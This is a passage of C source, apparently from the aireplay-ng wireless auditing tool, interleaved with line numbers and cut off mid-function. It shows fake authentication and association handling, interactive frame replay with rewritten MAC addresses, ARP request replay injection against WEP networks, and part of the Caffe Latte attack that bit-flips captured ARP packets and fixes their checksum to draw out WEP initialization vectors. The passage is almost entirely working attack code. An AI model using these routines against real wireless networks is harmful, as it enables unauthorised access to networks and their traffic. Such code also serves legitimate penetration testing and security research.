printf("Switching to shared key authentication\n");
1952
if(h80211[26] == 0x04)
1953
{
1954
printf("Challenge failure\n");
1955
challengelen=0;
1956
}
1957
read_sleep(2*1000000); //read sleep 2s
1958
challengelen = 0;
1959
continue;
1960
default:
1961
break;
1962
}
1963
1964
printf( "Authentication failed (code %d)\n", n );
1965
if(opt.npackets == -1) x_send = 4;
1966
read_sleep( 3*1000000 );
1967
challengelen = 0;
1968
continue;
1969
}
1970
1971
if(ska && h80211[26]==0x02 && challengelen == 0)
1972
{
1973
memcpy(challenge, h80211+24, caplen-24);
1974
challengelen=caplen-24;
1975
}
1976
if(ska)
1977
{
1978
if(h80211[26]==0x02)
1979
{
1980
state = 2; /* grab challenge */
1981
printf( "Authentication 1/2 successful\n" );
1982
}
1983
if(h80211[26]==0x04)
1984
{
1985
state = 4;
1986
printf( "Authentication 2/2 successful\n" );
1987
}
1988
}
1989
else
1990
{
1991
printf( "Authentication successful\n" );
1992
state = 4; /* auth. done */
1993
}
1994
}
1995
1996
/* check if we got an association response */
1997
1998
if( h80211[0] == 0x10 && state == 5 )
1999
{
2000
printf("\n");
2001
state = 0; PCT;
2002
2003
if( caplen < 30 )
2004
{
2005
printf( "Error: packet length < 30 bytes\n" );
2006
sleep( 3 );
2007
challengelen = 0;
2008
continue;
2009
}
2010
2011
n = h80211[26] + ( h80211[27] << 8 );
2012
2013
if( n != 0 )
2014
{
2015
switch( n )
2016
{
2017
case 1:
2018
printf( "Denied (code 1), is WPA in use ?\n" );
2019
break;
2020
2021
case 10:
2022
printf( "Denied (code 10), open (no WEP) ?\n" );
2023
break;
2024
2025
case 12:
2026
printf( "Denied (code 12), wrong ESSID or WPA ?\n" );
2027
break;
2028
2029
default:
2030
printf( "Association denied (code %d)\n", n );
2031
break;
2032
}
2033
2034
sleep( 3 );
2035
challengelen = 0;
2036
continue;
2037
}
2038
2039
aid=( ( (h80211[29] << 8) || (h80211[28]) ) & 0x3FFF);
2040
printf( "Association successful :-) (AID: %d)\n", aid );
2041
deauth_wait = 3;
2042
fflush( stdout );
2043
2044
tt = time( NULL );
2045
tr = time( NULL );
2046
2047
state = 6; /* assoc. done */
2048
}
2049
}
2050
}
2051
2052
return( 0 );
2053
}
2054
2055
int do_attack_interactive( void )
2056
{
2057
int caplen, n, z;
2058
int mi_b, mi_s, mi_d;
2059
struct timeval tv;
2060
struct timeval tv2;
2061
float f, ticks[3];
2062
unsigned char bssid[6];
2063
unsigned char smac[6];
2064
unsigned char dmac[6];
2065
2066
read_packets:
2067
2068
if( capture_ask_packet( &caplen, 0 ) != 0 )
2069
return( 1 );
2070
2071
z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30;
2072
if ( ( h80211[0] & 0x80 ) == 0x80 ) /* QoS */
2073
z+=2;
2074
2075
/* rewrite the frame control & MAC addresses */
2076
2077
switch( h80211[1] & 3 )
2078
{
2079
case 0: mi_b = 16; mi_s = 10; mi_d = 4; break;
2080
case 1: mi_b = 4; mi_s = 10; mi_d = 16; break;
2081
case 2: mi_b = 10; mi_s = 16; mi_d = 4; break;
2082
default: mi_b = 10; mi_d = 16; mi_s = 24; break;
2083
}
2084
2085
if( memcmp( opt.r_bssid, NULL_MAC, 6 ) == 0 )
2086
memcpy( bssid, h80211 + mi_b, 6 );
2087
else
2088
memcpy( bssid, opt.r_bssid, 6 );
2089
2090
if( memcmp( opt.r_smac , NULL_MAC, 6 ) == 0 )
2091
memcpy( smac, h80211 + mi_s, 6 );
2092
else
2093
memcpy( smac, opt.r_smac, 6 );
2094
2095
if( memcmp( opt.r_dmac , NULL_MAC, 6 ) == 0 )
2096
memcpy( dmac, h80211 + mi_d, 6 );
2097
else
2098
memcpy( dmac, opt.r_dmac, 6 );
2099
2100
if( opt.r_fctrl != -1 )
2101
{
2102
h80211[0] = opt.r_fctrl >> 8;
2103
h80211[1] = opt.r_fctrl & 0xFF;
2104
2105
switch( h80211[1] & 3 )
2106
{
2107
case 0: mi_b = 16; mi_s = 10; mi_d = 4; break;
2108
case 1: mi_b = 4; mi_s = 10; mi_d = 16; break;
2109
case 2: mi_b = 10; mi_s = 16; mi_d = 4; break;
2110
default: mi_b = 10; mi_d = 16; mi_s = 24; break;
2111
}
2112
}
2113
2114
memcpy( h80211 + mi_b, bssid, 6 );
2115
memcpy( h80211 + mi_s, smac , 6 );
2116
memcpy( h80211 + mi_d, dmac , 6 );
2117
2118
/* loop resending the packet */
2119
2120
/* Check if airodump-ng is running. If not, print that message */
2121
printf( "You should also start airodump-ng to capture replies.\n\n" );
2122
2123
signal( SIGINT, sighandler );
2124
ctrl_c = 0;
2125
2126
memset( ticks, 0, sizeof( ticks ) );
2127
2128
nb_pkt_sent = 0;
2129
2130
while( 1 )
2131
{
2132
if( ctrl_c )
2133
goto read_packets;
2134
2135
/* wait for the next timer interrupt, or sleep */
2136
2137
if( dev.fd_rtc >= 0 )
2138
{
2139
if( read( dev.fd_rtc, &n, sizeof( n ) ) < 0 )
2140
{
2141
perror( "read(/dev/rtc) failed" );
2142
return( 1 );
2143
}
2144
2145
ticks[0]++;
2146
ticks[1]++;
2147
ticks[2]++;
2148
}
2149
else
2150
{
2151
/* we can't trust usleep, since it depends on the HZ */
2152
2153
gettimeofday( &tv, NULL );
2154
usleep( 1000000/RTC_RESOLUTION );
2155
gettimeofday( &tv2, NULL );
2156
2157
f = 1000000 * (float) ( tv2.tv_sec - tv.tv_sec )
2158
+ (float) ( tv2.tv_usec - tv.tv_usec );
2159
2160
ticks[0] += f / ( 1000000/RTC_RESOLUTION );
2161
ticks[1] += f / ( 1000000/RTC_RESOLUTION );
2162
ticks[2] += f / ( 1000000/RTC_RESOLUTION );
2163
}
2164
2165
/* update the status line */
2166
2167
if( ticks[1] > (RTC_RESOLUTION/10) )
2168
{
2169
ticks[1] = 0;
2170
printf( "\rSent %ld packets...(%d pps)\33[K\r", nb_pkt_sent, (int)((double)nb_pkt_sent/((double)ticks[0]/(double)RTC_RESOLUTION)));
2171
fflush( stdout );
2172
}
2173
2174
if( ( ticks[2] * opt.r_nbpps ) / RTC_RESOLUTION < 1 )
2175
continue;
2176
2177
/* threshold reached */
2178
2179
ticks[2] = 0;
2180
2181
if( nb_pkt_sent == 0 )
2182
ticks[0] = 0;
2183
2184
if( send_packet( h80211, caplen ) < 0 )
2185
return( 1 );
2186
2187
if( ((double)ticks[0]/(double)RTC_RESOLUTION)*(double)opt.r_nbpps > (double)nb_pkt_sent )
2188
{
2189
if( send_packet( h80211, caplen ) < 0 )
2190
return( 1 );
2191
}
2192
}
2193
2194
return( 0 );
2195
}
2196
2197
int do_attack_arp_resend( void )
2198
{
2199
int nb_bad_pkt;
2200
int arp_off1, arp_off2;
2201
int i, n, caplen, nb_arp, z;
2202
long nb_pkt_read, nb_arp_tot, nb_ack_pkt;
2203
2204
time_t tc;
2205
float f, ticks[3];
2206
struct timeval tv;
2207
struct timeval tv2;
2208
struct tm *lt;
2209
2210
FILE *f_cap_out;
2211
struct pcap_file_header pfh_out;
2212
struct pcap_pkthdr pkh;
2213
struct ARP_req * arp;
2214
2215
if ( opt.ringbuffer )
2216
arp = (struct ARP_req*) malloc( opt.ringbuffer * sizeof( struct ARP_req ) );
2217
else
2218
arp = (struct ARP_req*) malloc( sizeof( struct ARP_req ) );
2219
2220
/* capture only WEP data to broadcast address */
2221
2222
opt.f_type = 2;
2223
opt.f_subtype = 0;
2224
opt.f_iswep = 1;
2225
2226
memset( opt.f_dmac, 0xFF, 6 );
2227
2228
if( memcmp( opt.r_smac, NULL_MAC, 6 ) == 0 )
2229
{
2230
printf( "Please specify a source MAC (-h).\n" );
2231
return( 1 );
2232
}
2233
2234
if(getnet(NULL, 1, 1) != 0)
2235
return 1;
2236
2237
/* create and write the output pcap header */
2238
2239
gettimeofday( &tv, NULL );
2240
2241
pfh_out.magic = TCPDUMP_MAGIC;
2242
pfh_out.version_major = PCAP_VERSION_MAJOR;
2243
pfh_out.version_minor = PCAP_VERSION_MINOR;
2244
pfh_out.thiszone = 0;
2245
pfh_out.sigfigs = 0;
2246
pfh_out.snaplen = 65535;
2247
pfh_out.linktype = LINKTYPE_IEEE802_11;
2248
2249
lt = localtime( (const time_t *) &tv.tv_sec );
2250
2251
memset( strbuf, 0, sizeof( strbuf ) );
2252
snprintf( strbuf, sizeof( strbuf ) - 1,
2253
"replay_arp-%02d%02d-%02d%02d%02d.cap",
2254
lt->tm_mon + 1, lt->tm_mday,
2255
lt->tm_hour, lt->tm_min, lt->tm_sec );
2256
2257
printf( "Saving ARP requests in %s\n", strbuf );
2258
2259
if( ( f_cap_out = fopen( strbuf, "wb+" ) ) == NULL )
2260
{
2261
perror( "fopen failed" );
2262
return( 1 );
2263
}
2264
2265
n = sizeof( struct pcap_file_header );
2266
2267
if( fwrite( &pfh_out, n, 1, f_cap_out ) != 1 )
2268
{
2269
perror( "fwrite failed\n" );
2270
return( 1 );
2271
}
2272
2273
fflush( f_cap_out );
2274
2275
printf( "You should also start airodump-ng to capture replies.\n" );
2276
2277
if(opt.port_in <= 0)
2278
{
2279
/* avoid blocking on reading the socket */
2280
if( fcntl( dev.fd_in, F_SETFL, O_NONBLOCK ) < 0 )
2281
{
2282
perror( "fcntl(O_NONBLOCK) failed" );
2283
return( 1 );
2284
}
2285
}
2286
2287
memset( ticks, 0, sizeof( ticks ) );
2288
2289
tc = time( NULL ) - 11;
2290
2291
nb_pkt_read = 0;
2292
nb_bad_pkt = 0;
2293
nb_ack_pkt = 0;
2294
nb_arp = 0;
2295
nb_arp_tot = 0;
2296
arp_off1 = 0;
2297
arp_off2 = 0;
2298
2299
while( 1 )
2300
{
2301
/* sleep until the next clock tick */
2302
2303
if( dev.fd_rtc >= 0 )
2304
{
2305
if( read( dev.fd_rtc, &n, sizeof( n ) ) < 0 )
2306
{
2307
perror( "read(/dev/rtc) failed" );
2308
return( 1 );
2309
}
2310
2311
ticks[0]++;
2312
ticks[1]++;
2313
ticks[2]++;
2314
}
2315
else
2316
{
2317
gettimeofday( &tv, NULL );
2318
usleep( 1000000/RTC_RESOLUTION );
2319
gettimeofday( &tv2, NULL );
2320
2321
f = 1000000 * (float) ( tv2.tv_sec - tv.tv_sec )
2322
+ (float) ( tv2.tv_usec - tv.tv_usec );
2323
2324
ticks[0] += f / ( 1000000/RTC_RESOLUTION );
2325
ticks[1] += f / ( 1000000/RTC_RESOLUTION );
2326
ticks[2] += f / ( 1000000/RTC_RESOLUTION );
2327
}
2328
2329
if( ticks[1] > (RTC_RESOLUTION/10) )
2330
{
2331
ticks[1] = 0;
2332
printf( "\rRead %ld packets (got %ld ARP requests and %ld ACKs), "
2333
"sent %ld packets...(%d pps)\r",
2334
nb_pkt_read, nb_arp_tot, nb_ack_pkt, nb_pkt_sent, (int)((double)nb_pkt_sent/((double)ticks[0]/(double)RTC_RESOLUTION)) );
2335
fflush( stdout );
2336
}
2337
2338
if( ( ticks[2] * opt.r_nbpps ) / RTC_RESOLUTION >= 1 )
2339
{
2340
/* threshold reach, send one frame */
2341
2342
ticks[2] = 0;
2343
2344
if( nb_arp > 0 )
2345
{
2346
if( nb_pkt_sent == 0 )
2347
ticks[0] = 0;
2348
2349
if( send_packet( arp[arp_off1].buf,
2350
arp[arp_off1].len ) < 0 )
2351
return( 1 );
2352
2353
if( ((double)ticks[0]/(double)RTC_RESOLUTION)*(double)opt.r_nbpps > (double)nb_pkt_sent )
2354
{
2355
if( send_packet( arp[arp_off1].buf,
2356
arp[arp_off1].len ) < 0 )
2357
return( 1 );
2358
}
2359
2360
if( ++arp_off1 >= nb_arp )
2361
arp_off1 = 0;
2362
}
2363
}
2364
2365
/* read a frame, and check if it's an ARP request */
2366
2367
if( opt.s_file == NULL )
2368
{
2369
gettimeofday( &tv, NULL );
2370
2371
caplen = read_packet( h80211, sizeof( h80211 ), NULL );
2372
2373
if( caplen < 0 ) return( 1 );
2374
if( caplen == 0 ) continue;
2375
}
2376
else
2377
{
2378
n = sizeof( pkh );
2379
2380
if( fread( &pkh, n, 1, dev.f_cap_in ) != 1 )
2381
{
2382
opt.s_file = NULL;
2383
continue;
2384
}
2385
2386
if( dev.pfh_in.magic == TCPDUMP_CIGAM )
2387
SWAP32( pkh.caplen );
2388
2389
tv.tv_sec = pkh.tv_sec;
2390
tv.tv_usec = pkh.tv_usec;
2391
2392
n = caplen = pkh.caplen;
2393
2394
if( n <= 0 || n > (int) sizeof( h80211 ) || n > (int) sizeof( tmpbuf ) )
2395
{
2396
printf( "\r\33[KInvalid packet length %d.\n", n );
2397
opt.s_file = NULL;
2398
continue;
2399
}
2400
2401
if( fread( h80211, n, 1, dev.f_cap_in ) != 1 )
2402
{
2403
opt.s_file = NULL;
2404
continue;
2405
}
2406
2407
if( dev.pfh_in.linktype == LINKTYPE_PRISM_HEADER )
2408
{
2409
/* remove the prism header */
2410
2411
if( h80211[7] == 0x40 )
2412
n = 64;
2413
else
2414
n = *(int *)( h80211 + 4 );
2415
2416
if( n < 8 || n >= (int) caplen )
2417
continue;
2418
2419
memcpy( tmpbuf, h80211, caplen );
2420
caplen -= n;
2421
memcpy( h80211, tmpbuf + n, caplen );
2422
}
2423
2424
if( dev.pfh_in.linktype == LINKTYPE_RADIOTAP_HDR )
2425
{
2426
/* remove the radiotap header */
2427
2428
n = *(unsigned short *)( h80211 + 2 );
2429
2430
if( n <= 0 || n >= (int) caplen )
2431
continue;
2432
2433
memcpy( tmpbuf, h80211, caplen );
2434
caplen -= n;
2435
memcpy( h80211, tmpbuf + n, caplen );
2436
}
2437
2438
if( dev.pfh_in.linktype == LINKTYPE_PPI_HDR )
2439
{
2440
/* remove the PPI header */
2441
2442
n = le16_to_cpu(*(unsigned short *)( h80211 + 2));
2443
2444
if( n <= 0 || n>= (int) caplen )
2445
continue;
2446
2447
/* for a while Kismet logged broken PPI headers */
2448
if ( n == 24 && le16_to_cpu(*(unsigned short *)(h80211 + 8)) == 2 )
2449
n = 32;
2450
2451
if( n <= 0 || n>= (int) caplen )
2452
continue;
2453
2454
memcpy( tmpbuf, h80211, caplen );
2455
caplen -= n;
2456
memcpy( h80211, tmpbuf + n, caplen );
2457
}
2458
}
2459
2460
nb_pkt_read++;
2461
2462
/* check if it's a disas. or deauth packet */
2463
2464
if( ( h80211[0] == 0xC0 || h80211[0] == 0xA0 ) &&
2465
! memcmp( h80211 + 4, opt.r_smac, 6 ) )
2466
{
2467
nb_bad_pkt++;
2468
2469
if( nb_bad_pkt > 64 && time( NULL ) - tc >= 10 )
2470
{
2471
printf( "\33[KNotice: got a deauth/disassoc packet. Is the "
2472
"source MAC associated ?\n" );
2473
2474
tc = time( NULL );
2475
nb_bad_pkt = 0;
2476
}
2477
}
2478
2479
if( h80211[0] == 0xD4 &&
2480
! memcmp( h80211 + 4, opt.r_smac, 6 ) )
2481
{
2482
nb_ack_pkt++;
2483
}
2484
2485
/* check if it's a potential ARP request */
2486
2487
opt.f_minlen = opt.f_maxlen = 68;
2488
2489
if( filter_packet( h80211, caplen ) == 0 )
2490
goto add_arp;
2491
2492
opt.f_minlen = opt.f_maxlen = 86;
2493
2494
if( filter_packet( h80211, caplen ) == 0 )
2495
{
2496
add_arp:
2497
z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30;
2498
if ( ( h80211[0] & 0x80 ) == 0x80 ) /* QoS */
2499
z+=2;
2500
2501
switch( h80211[1] & 3 )
2502
{
2503
case 1: /* ToDS */
2504
{
2505
/* keep as a ToDS packet */
2506
2507
memcpy( h80211 + 4, opt.f_bssid, 6 );
2508
memcpy( h80211 + 10, opt.r_smac, 6 );
2509
memcpy( h80211 + 16, opt.f_dmac, 6 );
2510
2511
h80211[1] = 0x41; /* ToDS & WEP */
2512
}
2513
case 2: /* FromDS */
2514
{
2515
if( opt.r_fromdsinj )
2516
{
2517
/* keep as a FromDS packet */
2518
2519
memcpy( h80211 + 4, opt.f_dmac, 6 );
2520
memcpy( h80211 + 10, opt.f_bssid, 6 );
2521
memcpy( h80211 + 16, opt.r_smac, 6 );
2522
2523
h80211[1] = 0x42; /* FromDS & WEP */
2524
}
2525
else
2526
{
2527
/* rewrite header to make it a ToDS packet */
2528
2529
memcpy( h80211 + 4, opt.f_bssid, 6 );
2530
memcpy( h80211 + 10, opt.r_smac, 6 );
2531
memcpy( h80211 + 16, opt.f_dmac, 6 );
2532
2533
h80211[1] = 0x41; /* ToDS & WEP */
2534
}
2535
}
2536
}
2537
2538
//should be correct already, keep qos/wds status
2539
// h80211[0] = 0x08; /* normal data */
2540
2541
/* if same IV, perhaps our own packet, skip it */
2542
2543
for( i = 0; i < nb_arp; i++ )
2544
{
2545
if( memcmp( h80211 + z, arp[i].buf + arp[i].hdrlen, 4 ) == 0 )
2546
break;
2547
}
2548
2549
if( i < nb_arp )
2550
continue;
2551
2552
if( caplen > 128)
2553
continue;
2554
/* add the ARP request in the ring buffer */
2555
2556
nb_arp_tot++;
2557
2558
/* Ring buffer size: by default: 8 ) */
2559
2560
if( nb_arp >= opt.ringbuffer && opt.ringbuffer > 0)
2561
{
2562
/* no more room, overwrite oldest entry */
2563
2564
memcpy( arp[arp_off2].buf, h80211, caplen );
2565
arp[arp_off2].len = caplen;
2566
arp[arp_off2].hdrlen = z;
2567
2568
if( ++arp_off2 >= nb_arp )
2569
arp_off2 = 0;
2570
} else {
2571
2572
if( ( arp[nb_arp].buf = malloc( 128 ) ) == NULL ) {
2573
perror( "malloc failed" );
2574
return( 1 );
2575
}
2576
2577
memcpy( arp[nb_arp].buf, h80211, caplen );
2578
arp[nb_arp].len = caplen;
2579
arp[nb_arp].hdrlen = z;
2580
nb_arp++;
2581
2582
pkh.tv_sec = tv.tv_sec;
2583
pkh.tv_usec = tv.tv_usec;
2584
pkh.caplen = caplen;
2585
pkh.len = caplen;
2586
2587
n = sizeof( pkh );
2588
2589
if( fwrite( &pkh, n, 1, f_cap_out ) != 1 ) {
2590
perror( "fwrite failed" );
2591
return( 1 );
2592
}
2593
2594
n = pkh.caplen;
2595
2596
if( fwrite( h80211, n, 1, f_cap_out ) != 1 ) {
2597
perror( "fwrite failed" );
2598
return( 1 );
2599
}
2600
2601
fflush( f_cap_out );
2602
}
2603
}
2604
}
2605
2606
return( 0 );
2607
}
2608
2609
int do_attack_caffe_latte( void )
2610
{
2611
int nb_bad_pkt;
2612
int arp_off1, arp_off2;
2613
int i, n, caplen, nb_arp, z;
2614
long nb_pkt_read, nb_arp_tot, nb_ack_pkt;
2615
uchar flip[4096];
2616
2617
time_t tc;
2618
float f, ticks[3];
2619
struct timeval tv;
2620
struct timeval tv2;
2621
struct tm *lt;
2622
2623
FILE *f_cap_out;
2624
struct pcap_file_header pfh_out;
2625
struct pcap_pkthdr pkh;
2626
struct ARP_req * arp;
2627
2628
if ( opt.ringbuffer )
2629
arp = (struct ARP_req*) malloc( opt.ringbuffer * sizeof( struct ARP_req ) );
2630
else
2631
arp = (struct ARP_req*) malloc( sizeof( struct ARP_req ) );
2632
2633
/* capture only WEP data to broadcast address */
2634
2635
opt.f_type = 2;
2636
opt.f_subtype = 0;
2637
opt.f_iswep = 1;
2638
opt.f_fromds = 0;
2639
2640
if(getnet(NULL, 1, 1) != 0)
2641
return 1;
2642
2643
if( memcmp( opt.f_bssid, NULL_MAC, 6 ) == 0 )
2644
{
2645
printf( "Please specify a BSSID (-b).\n" );
2646
return( 1 );
2647
}
2648
/* create and write the output pcap header */
2649
2650
gettimeofday( &tv, NULL );
2651
2652
pfh_out.magic = TCPDUMP_MAGIC;
2653
pfh_out.version_major = PCAP_VERSION_MAJOR;
2654
pfh_out.version_minor = PCAP_VERSION_MINOR;
2655
pfh_out.thiszone = 0;
2656
pfh_out.sigfigs = 0;
2657
pfh_out.snaplen = 65535;
2658
pfh_out.linktype = LINKTYPE_IEEE802_11;
2659
2660
lt = localtime( (const time_t *) &tv.tv_sec );
2661
2662
memset( strbuf, 0, sizeof( strbuf ) );
2663
snprintf( strbuf, sizeof( strbuf ) - 1,
2664
"replay_arp-%02d%02d-%02d%02d%02d.cap",
2665
lt->tm_mon + 1, lt->tm_mday,
2666
lt->tm_hour, lt->tm_min, lt->tm_sec );
2667
2668
printf( "Saving ARP requests in %s\n", strbuf );
2669
2670
if( ( f_cap_out = fopen( strbuf, "wb+" ) ) == NULL )
2671
{
2672
perror( "fopen failed" );
2673
return( 1 );
2674
}
2675
2676
n = sizeof( struct pcap_file_header );
2677
2678
if( fwrite( &pfh_out, n, 1, f_cap_out ) != 1 )
2679
{
2680
perror( "fwrite failed\n" );
2681
return( 1 );
2682
}
2683
2684
fflush( f_cap_out );
2685
2686
printf( "You should also start airodump-ng to capture replies.\n" );
2687
2688
if(opt.port_in <= 0)
2689
{
2690
/* avoid blocking on reading the socket */
2691
if( fcntl( dev.fd_in, F_SETFL, O_NONBLOCK ) < 0 )
2692
{
2693
perror( "fcntl(O_NONBLOCK) failed" );
2694
return( 1 );
2695
}
2696
}
2697
2698
memset( ticks, 0, sizeof( ticks ) );
2699
2700
tc = time( NULL ) - 11;
2701
2702
nb_pkt_read = 0;
2703
nb_bad_pkt = 0;
2704
nb_ack_pkt = 0;
2705
nb_arp = 0;
2706
nb_arp_tot = 0;
2707
arp_off1 = 0;
2708
arp_off2 = 0;
2709
2710
while( 1 )
2711
{
2712
/* sleep until the next clock tick */
2713
2714
if( dev.fd_rtc >= 0 )
2715
{
2716
if( read( dev.fd_rtc, &n, sizeof( n ) ) < 0 )
2717
{
2718
perror( "read(/dev/rtc) failed" );
2719
return( 1 );
2720
}
2721
2722
ticks[0]++;
2723
ticks[1]++;
2724
ticks[2]++;
2725
}
2726
else
2727
{
2728
gettimeofday( &tv, NULL );
2729
usleep( 1000000/RTC_RESOLUTION );
2730
gettimeofday( &tv2, NULL );
2731
2732
f = 1000000 * (float) ( tv2.tv_sec - tv.tv_sec )
2733
+ (float) ( tv2.tv_usec - tv.tv_usec );
2734
2735
ticks[0] += f / ( 1000000/RTC_RESOLUTION );
2736
ticks[1] += f / ( 1000000/RTC_RESOLUTION );
2737
ticks[2] += f / ( 1000000/RTC_RESOLUTION );
2738
}
2739
2740
if( ticks[1] > (RTC_RESOLUTION/10) )
2741
{
2742
ticks[1] = 0;
2743
printf( "\rRead %ld packets (%ld ARPs, %ld ACKs), "
2744
"sent %ld packets...(%d pps)\r",
2745
nb_pkt_read, nb_arp_tot, nb_ack_pkt, nb_pkt_sent, (int)((double)nb_pkt_sent/((double)ticks[0]/(double)RTC_RESOLUTION)) );
2746
fflush( stdout );
2747
}
2748
2749
if( ( ticks[2] * opt.r_nbpps ) / RTC_RESOLUTION >= 1 )
2750
{
2751
/* threshold reach, send one frame */
2752
2753
ticks[2] = 0;
2754
2755
if( nb_arp > 0 )
2756
{
2757
if( nb_pkt_sent == 0 )
2758
ticks[0] = 0;
2759
2760
if( send_packet( arp[arp_off1].buf,
2761
arp[arp_off1].len ) < 0 )
2762
return( 1 );
2763
2764
if( ((double)ticks[0]/(double)RTC_RESOLUTION)*(double)opt.r_nbpps > (double)nb_pkt_sent )
2765
{
2766
if( send_packet( arp[arp_off1].buf,
2767
arp[arp_off1].len ) < 0 )
2768
return( 1 );
2769
}
2770
2771
if( ++arp_off1 >= nb_arp )
2772
arp_off1 = 0;
2773
}
2774
}
2775
2776
/* read a frame, and check if it's an ARP request */
2777
2778
if( opt.s_file == NULL )
2779
{
2780
gettimeofday( &tv, NULL );
2781
2782
caplen = read_packet( h80211, sizeof( h80211 ), NULL );
2783
2784
if( caplen < 0 ) return( 1 );
2785
if( caplen == 0 ) continue;
2786
}
2787
else
2788
{
2789
n = sizeof( pkh );
2790
2791
if( fread( &pkh, n, 1, dev.f_cap_in ) != 1 )
2792
{
2793
opt.s_file = NULL;
2794
continue;
2795
}
2796
2797
if( dev.pfh_in.magic == TCPDUMP_CIGAM )
2798
SWAP32( pkh.caplen );
2799
2800
tv.tv_sec = pkh.tv_sec;
2801
tv.tv_usec = pkh.tv_usec;
2802
2803
n = caplen = pkh.caplen;
2804
2805
if( n <= 0 || n > (int) sizeof( h80211 ) || n > (int) sizeof( tmpbuf ) )
2806
{
2807
printf( "\r\33[KInvalid packet length %d.\n", n );
2808
opt.s_file = NULL;
2809
continue;
2810
}
2811
2812
if( fread( h80211, n, 1, dev.f_cap_in ) != 1 )
2813
{
2814
opt.s_file = NULL;
2815
continue;
2816
}
2817
2818
if( dev.pfh_in.linktype == LINKTYPE_PRISM_HEADER )
2819
{
2820
/* remove the prism header */
2821
2822
if( h80211[7] == 0x40 )
2823
n = 64;
2824
else
2825
n = *(int *)( h80211 + 4 );
2826
2827
if( n < 8 || n >= (int) caplen )
2828
continue;
2829
2830
memcpy( tmpbuf, h80211, caplen );
2831
caplen -= n;
2832
memcpy( h80211, tmpbuf + n, caplen );
2833
}
2834
2835
if( dev.pfh_in.linktype == LINKTYPE_RADIOTAP_HDR )
2836
{
2837
/* remove the radiotap header */
2838
2839
n = *(unsigned short *)( h80211 + 2 );
2840
2841
if( n <= 0 || n >= (int) caplen )
2842
continue;
2843
2844
memcpy( tmpbuf, h80211, caplen );
2845
caplen -= n;
2846
memcpy( h80211, tmpbuf + n, caplen );
2847
}
2848
2849
if( dev.pfh_in.linktype == LINKTYPE_PPI_HDR )
2850
{
2851
/* remove the PPI header */
2852
2853
n = le16_to_cpu(*(unsigned short *)( h80211 + 2));
2854
2855
if( n <= 0 || n>= (int) caplen )
2856
continue;
2857
2858
/* for a while Kismet logged broken PPI headers */
2859
if ( n == 24 && le16_to_cpu(*(unsigned short *)(h80211 + 8)) == 2 )
2860
n = 32;
2861
2862
if( n <= 0 || n>= (int) caplen )
2863
continue;
2864
2865
memcpy( tmpbuf, h80211, caplen );
2866
caplen -= n;
2867
memcpy( h80211, tmpbuf + n, caplen );
2868
}
2869
}
2870
2871
nb_pkt_read++;
2872
2873
/* check if it's a disas. or deauth packet */
2874
2875
if( ( h80211[0] == 0xC0 || h80211[0] == 0xA0 ) &&
2876
! memcmp( h80211 + 4, opt.r_smac, 6 ) )
2877
{
2878
nb_bad_pkt++;
2879
2880
if( nb_bad_pkt > 64 && time( NULL ) - tc >= 10 )
2881
{
2882
printf( "\33[KNotice: got a deauth/disassoc packet. Is the "
2883
"source MAC associated ?\n" );
2884
2885
tc = time( NULL );
2886
nb_bad_pkt = 0;
2887
}
2888
}
2889
2890
if( h80211[0] == 0xD4 &&
2891
! memcmp( h80211 + 4, opt.f_bssid, 6 ) )
2892
{
2893
nb_ack_pkt++;
2894
}
2895
2896
/* check if it's a potential ARP request */
2897
2898
opt.f_minlen = opt.f_maxlen = 68;
2899
2900
if( filter_packet( h80211, caplen ) == 0 )
2901
goto add_arp;
2902
2903
opt.f_minlen = opt.f_maxlen = 86;
2904
2905
if( filter_packet( h80211, caplen ) == 0 )
2906
{
2907
add_arp:
2908
z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30;
2909
if ( ( h80211[0] & 0x80 ) == 0x80 ) /* QoS */
2910
z+=2;
2911
2912
switch( h80211[1] & 3 )
2913
{
2914
case 0: /* ad-hoc */
2915
{
2916
if(memcmp(h80211 + 16, BROADCAST, 6) == 0)
2917
{
2918
/* rewrite to an ad-hoc packet */
2919
2920
memcpy( h80211 + 4, BROADCAST, 6 );
2921
memcpy( h80211 + 10, opt.r_smac, 6 );
2922
memcpy( h80211 + 16, opt.f_bssid, 6 );
2923
2924
h80211[1] = 0x40; /* WEP */
2925
}
2926
else
2927
{
2928
nb_arp_tot++;
2929
continue;
2930
}
2931
2932
break;
2933
}
2934
case 1: /* ToDS */
2935
{
2936
if(memcmp(h80211 + 16, BROADCAST, 6) == 0)
2937
{
2938
/* rewrite to a FromDS packet */
2939
2940
memcpy( h80211 + 4, BROADCAST, 6 );
2941
memcpy( h80211 + 10, opt.f_bssid, 6 );
2942
memcpy( h80211 + 16, opt.f_bssid, 6 );
2943
2944
h80211[1] = 0x42; /* ToDS & WEP */
2945
}
2946
else
2947
{
2948
nb_arp_tot++;
2949
continue;
2950
}
2951
2952
break;
2953
}
2954
default:
2955
continue;
2956
}
2957
2958
// h80211[0] = 0x08; /* normal data */
2959
2960
/* if same IV, perhaps our own packet, skip it */
2961
2962
for( i = 0; i < nb_arp; i++ )
2963
{
2964
if( memcmp( h80211 + z, arp[i].buf + arp[i].hdrlen, 4 ) == 0 )
2965
break;
2966
}
2967
2968
if( i < nb_arp )
2969
continue;
2970
2971
if( caplen > 128)
2972
continue;
2973
/* add the ARP request in the ring buffer */
2974
2975
nb_arp_tot++;
2976
2977
/* Ring buffer size: by default: 8 ) */
2978
2979
if( nb_arp >= opt.ringbuffer && opt.ringbuffer > 0)
2980
continue;
2981
else {
2982
2983
if( ( arp[nb_arp].buf = malloc( 128 ) ) == NULL ) {
2984
perror( "malloc failed" );
2985
return( 1 );
2986
}
2987
2988
memset(flip, 0, 4096);
2989
2990
// flip[49-24-4] ^= ((rand() % 255)+1); //flip random bits in last byte of sender MAC
2991
// flip[53-24-4] ^= ((rand() % 255)+1); //flip random bits in last byte of sender IP
2992
flip[z+21] ^= ((rand() % 255)+1); //flip random bits in last byte of sender MAC
2993
flip[z+25] ^= ((rand() % 255)+1); //flip random bits in last byte of sender IP
2994
2995
add_crc32_plain(flip, caplen-z-4-4);
2996
for(i=0; i<caplen-z-4; i++)
2997
(h80211+z+4)[i] ^= flip[i];
2998
2999
memcpy( arp[nb_arp].buf, h80211, caplen );
3000
arp[nb_arp].len = caplen;
3001
arp[nb_arp].hdrlen = z;
3002
nb_arp++;
3003
3004
pkh.tv_sec = tv.tv_sec;
3005
pkh.tv_usec = tv.tv_usec;
3006
pkh.caplen = caplen;
3007
pkh.len = caplen;
3008
3009
n = sizeof( pkh );
3010
3011
